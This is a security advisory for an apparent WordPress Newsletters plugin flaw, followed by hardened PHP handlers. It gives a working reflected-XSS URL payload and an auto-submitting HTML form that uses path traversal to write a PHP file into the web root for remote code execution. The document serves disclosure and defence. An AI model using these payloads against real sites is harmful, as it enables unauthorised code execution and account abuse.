- Lack of CSRF, authorisation and sanitisation checks in the ajax_load_new_editor() function, registered as an AJAX method, leads to an authenticated reflected XSS issue: the contentarea parameter is reflected into the response without escaping.
- Authenticated directory traversal leading to RCE: the exportfile parameter of the newsletters_exportmultiple AJAX action is used as a file path without being confined to the intended export directory, and the exported "subscribers" values are written into that file verbatim, so a low-privileged user can drop a PHP file inside the web root.
XSS: As an authenticated user (with a role as low as Subscriber), open https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea="><svg/onload=alert(/XSS/)> and the injected SVG element executes in the page.
RCE: Save the code below in an HTML file and open it in a browser while logged in (with a role as low as Subscriber). The page auto-submits the form; the traversal in exportfile picks the destination and the subscribers[0][0] value becomes the file content.
<html>
<!-- Auto-submit the form as soon as the page loads (the stray ';' after the attribute in the original has been removed). -->
<body onload="document.forms[0].submit()">
<!-- The query string carries the AJAX action and the traversing exportfile; the traversal escapes the export directory and lands in wp-content/uploads/. -->
<form action="https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_exportmultiple&exportfile=../../nl_rce.php" method="POST">
<!-- Empty heading row, so the first line written to the file is the subscriber value below. -->
<input type="hidden" name="headings[0][0]" value=""/>
<!-- Written into the file verbatim, hence the PHP tag. -->
<input type="hidden" name="subscribers[0][0]" value="<?php echo('Authenticated RCE'); ?>"/>
</form>
</body>
</html>
The resulting PHP file is then reachable at https://<BLOG>/wp-content/uploads/nl_rce.php, and the injected code runs as soon as that URL is requested.
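For reference, the shape of a hardened version of the two AJAX handlers, added here as an illustration and not taken from the plugin's own code. It assumes the two admin-ajax action names shown above, a nonce field named nonce, the manage_options capability as the gate, and an export directory below wp-content/uploads; the function names are hypothetical. Each of the three missing checks from the first bullet (CSRF, authorisation, sanitisation) is applied, and the export path is reduced to a basename and verified to sit inside the export directory, so ../../nl_rce.php can no longer leave it and the file extension is forced to .csv.

```php
<?php
// Added example, not the Newsletters plugin's own code. Handler names, the
// nonce action strings and the export directory layout are assumptions.

add_action( 'wp_ajax_newsletters_load_new_editor', 'hardened_load_new_editor' );
add_action( 'wp_ajax_newsletters_exportmultiple', 'hardened_exportmultiple' );

function hardened_load_new_editor() {
    // CSRF: the request must carry a nonce issued to this user for this action.
    check_ajax_referer( 'newsletters_load_new_editor', 'nonce' );
    // Authorisation: a Subscriber has no business opening the newsletter editor.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // Sanitisation: restrict the value to [a-z0-9_-] and escape it for the
    // attribute context it is reflected into, so "><svg/onload=...> cannot
    // break out of the attribute.
    $contentarea = isset( $_GET['contentarea'] ) ? sanitize_key( wp_unslash( $_GET['contentarea'] ) ) : '';
    echo '<textarea id="' . esc_attr( $contentarea ) . '"></textarea>';
    wp_die();
}

function hardened_exportmultiple() {
    check_ajax_referer( 'newsletters_exportmultiple', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $target = safe_export_path( export_dir(), isset( $_POST['exportfile'] ) ? wp_unslash( $_POST['exportfile'] ) : '' );
    if ( null === $target ) {
        wp_send_json_error( 'invalid exportfile', 400 );
    }
    $rows = isset( $_POST['subscribers'] ) ? (array) wp_unslash( $_POST['subscribers'] ) : array();
    file_put_contents( $target, build_csv( $rows ) );
    wp_send_json_success( basename( $target ) );
}

// Export directory below uploads (assumed layout), created if missing.
function export_dir() {
    $upload = wp_upload_dir();
    $dir    = trailingslashit( $upload['basedir'] ) . 'newsletters-export';
    wp_mkdir_p( $dir );
    return $dir;
}

// Turn a user-supplied file name into a path that is guaranteed to be a .csv
// inside $dir, or null if it cannot be.
function safe_export_path( $dir, $name ) {
    // Drop any directory component: '../../nl_rce.php' becomes 'nl_rce.php'.
    $name = sanitize_file_name( basename( (string) $name ) );
    // Only the extension this feature is meant to write is allowed, so even a
    // name that survives basename() cannot produce a file PHP would execute.
    if ( '' === $name || ! preg_match( '/^[A-Za-z0-9_-]+\.csv$/', $name ) ) {
        return null;
    }
    $base = realpath( $dir );
    if ( false === $base ) {
        return null;
    }
    $full = $base . DIRECTORY_SEPARATOR . $name;
    // Belt and braces: the final path must still start with the export directory.
    if ( 0 !== strpos( $full, $base . DIRECTORY_SEPARATOR ) ) {
        return null;
    }
    return $full;
}

// Serialise the posted rows with fputcsv so every cell is quoted; the PHP tag
// from the PoC ends up as an inert string inside a .csv file.
function build_csv( array $rows ) {
    $fh = fopen( 'php://temp', 'r+' );
    foreach ( $rows as $row ) {
        fputcsv( $fh, array_map( 'sanitize_text_field', (array) $row ) );
    }
    rewind( $fh );
    $csv = stream_get_contents( $fh );
    fclose( $fh );
    return $csv;
}
```

With these checks in place the PoC above fails three times over: the form carries no valid nonce, a Subscriber lacks manage_options, and even a crafted exportfile of ../../nl_rce.php is reduced to a rejected basename that does not end in .csv.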